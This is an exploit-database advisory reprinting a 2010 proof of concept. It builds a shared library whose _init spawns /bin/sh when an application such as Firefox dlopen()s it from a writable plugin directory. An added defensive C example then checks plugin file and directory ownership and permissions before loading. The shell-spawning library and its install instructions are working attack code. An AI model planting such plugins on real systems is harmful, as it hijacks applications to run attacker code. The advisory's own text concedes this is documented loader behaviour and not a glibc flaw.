GNU glibc <= 2.11.1 exploit that leverages browser plugin functionality

2010.04.08
Credit: Rh0
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Local Glibc shared library (.so) exploit
# Date: 07.04.10
# Author: Rh0 (Rh0@z1p.biz)
# Software Link: NA
# Version: <= 2.11.1, higher not tested
# Tested on: Debian stable (x86-64), Ubuntu 9.10 (x86), Fedora 12 (x86)
# CVE : NA
# Code :
#!/bin/sh
# Many Linux applications load their plugins as shared libraries:
# Mozilla, the Geany IDE, Compiz, the Epiphany web browser and others.
# A plugin is mapped and initialized with dlopen(), which is part of
# glibc (see http://linux.die.net/man/3/dlopen). Depending on the
# application this happens at startup, when a menu such as
# "->Tools->Plugins" is opened, or at the latest when the plugin is
# activated.
# dlopen() always runs the library's initialization code (the _init
# entry recorded as DT_INIT, or the constructors in DT_INIT_ARRAY)
# before it returns. A malformed _init makes dlopen() crash (NULL
# dereference), but a crash is not needed to exploit the application:
# whatever _init does runs with the privileges of the process that
# called dlopen(). The payload can be a freshly compiled library
# dropped into a plugin directory the user can write to, or the _init
# of a plugin already shipped with the application can be overwritten
# with working shellcode (or with \x41s just to crash it).
# Note that this is documented dlopen() behaviour rather than a memory
# corruption bug in glibc: the precondition is write access to a
# directory the application loads plugins from, and the payload runs
# as that user, so the impact is code execution in the context of the
# victim application (Risk: Medium, Local only).
# The library below is linked with ld directly instead of gcc -shared,
# because gcc would pull in crti.o, which already defines _init and
# would clash with the one we supply.
# PoC:
cat >Xlibx.c<<EOF
#include <unistd.h>

/* Legacy DT_INIT entry point: runs inside dlopen() before it returns. */
void _init(void)
{
    char *const argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL); /* evil _init */
}
EOF
gcc -fPIC -c Xlibx.c
ld -shared -soname Xlibx.so -o Xlibx.so Xlibx.o -lc
rm Xlibx.c
rm Xlibx.o
echo "* copy Xlibx.so to appropriate directory:"
echo "* Mozilla: HOMEDIR/.mozilla/plugins/ "
echo "* firefox->Edit->Preferences => Exploit "
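The defensive side of the above, as an added example that is not part of Rh0's advisory: a plugin host that is about to dlopen() a library should first check that neither the file nor its directory can be modified by another user, since dlopen() will run whatever initializer it finds. The function and enum names (plugin_path_is_trusted, plugin_selfcheck, PLUGIN_*) are hypothetical, and plugin_selfcheck() builds its own constructed fixtures under /tmp (a 0644 file, a 0666 file, a 0777 directory, a symlink) so the block runs offline without touching a real plugin directory.

```c
/* Trust check to run before dlopen()ing a plugin. Added example, not
 * code from the advisory; all names below are hypothetical. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <libgen.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

enum plugin_verdict {
    PLUGIN_OK = 0,
    PLUGIN_ERR_STAT,        /* lstat() failed (missing, unreadable ...) */
    PLUGIN_ERR_NOT_REGULAR, /* symlink, directory, device: not a plain file */
    PLUGIN_ERR_OWNER,       /* owned by neither root nor the calling user */
    PLUGIN_ERR_WRITABLE,    /* group- or world-writable */
    PLUGIN_ERR_DIR          /* the containing directory fails the same checks */
};

/* lstat() deliberately: a symlink planted in the plugin directory must
 * not be followed to a file that lives somewhere we did not vet. */
static enum plugin_verdict check_node(const char *path, int want_dir)
{
    struct stat st;
    if (lstat(path, &st) != 0)
        return PLUGIN_ERR_STAT;
    if (want_dir ? !S_ISDIR(st.st_mode) : !S_ISREG(st.st_mode))
        return PLUGIN_ERR_NOT_REGULAR;
    if (st.st_uid != 0 && st.st_uid != geteuid())
        return PLUGIN_ERR_OWNER;
    /* A sticky world-writable directory such as /tmp is still unsafe:
     * anyone can drop a new .so there, so reject any group/other write bit. */
    if (st.st_mode & (S_IWGRP | S_IWOTH))
        return PLUGIN_ERR_WRITABLE;
    return PLUGIN_OK;
}

/* Returns PLUGIN_OK only if the file and its parent directory are regular,
 * owned by root or the caller, and not writable by anyone else. */
enum plugin_verdict plugin_path_is_trusted(const char *path)
{
    enum plugin_verdict v = check_node(path, 0);
    if (v != PLUGIN_OK)
        return v;
    char *copy = strdup(path);           /* dirname() may modify its input */
    if (!copy)
        return PLUGIN_ERR_STAT;
    v = check_node(dirname(copy), 1);
    free(copy);
    return v == PLUGIN_OK ? PLUGIN_OK : PLUGIN_ERR_DIR;
}

/* Builds constructed fixtures in a fresh 0700 temp dir and checks each
 * verdict; returns 1 if every case behaves as expected, 0 otherwise. */
int plugin_selfcheck(void)
{
    char dir[] = "/tmp/plugtrustXXXXXX";
    char so[PATH_MAX], lnk[PATH_MAX];
    int ok = 1, fd;

    if (!mkdtemp(dir))                    /* mode 0700, owned by us */
        return 0;
    snprintf(so, sizeof so, "%s/good.so", dir);
    snprintf(lnk, sizeof lnk, "%s/link.so", dir);
    fd = open(so, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0) { rmdir(dir); return 0; }
    close(fd);

    ok &= plugin_path_is_trusted(so) == PLUGIN_OK;                  /* 0644 in 0700 dir */
    ok &= chmod(so, 0666) == 0 &&
          plugin_path_is_trusted(so) == PLUGIN_ERR_WRITABLE;        /* world-writable file */
    ok &= chmod(so, 0644) == 0 && chmod(dir, 0777) == 0 &&
          plugin_path_is_trusted(so) == PLUGIN_ERR_DIR;             /* anyone can replace it */
    ok &= chmod(dir, 0700) == 0;
    ok &= symlink(so, lnk) == 0 &&
          plugin_path_is_trusted(lnk) == PLUGIN_ERR_NOT_REGULAR;    /* symlink rejected */
    ok &= plugin_path_is_trusted(dir) == PLUGIN_ERR_NOT_REGULAR;    /* directory is not a plugin */

    unlink(lnk); unlink(so); rmdir(dir);
    return ok;
}

int main(int argc, char **argv)
{
    static const char *const names[] = { "ok", "stat failed", "not a regular file",
                                         "bad owner", "writable by others",
                                         "untrusted directory" };
    if (argc < 2) {
        printf("selfcheck: %s\n", plugin_selfcheck() ? "pass" : "FAIL");
        return 0;
    }
    printf("%s: %s\n", argv[1], names[plugin_path_is_trusted(argv[1])]);
    return 0;
}
```

Run it with no arguments to execute the self-check, or with a path (e.g. ~/.mozilla/plugins/Xlibx.so) to see the verdict the host would get before calling dlopen(). The check is still open to a race between the stat and the load; a host that wants to close that window opens the file, fstat()s the descriptor, and then dlopen()s "/proc/self/fd/N" so the vetted inode is the one that gets mapped.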


Copyright 2024, cxsecurity.com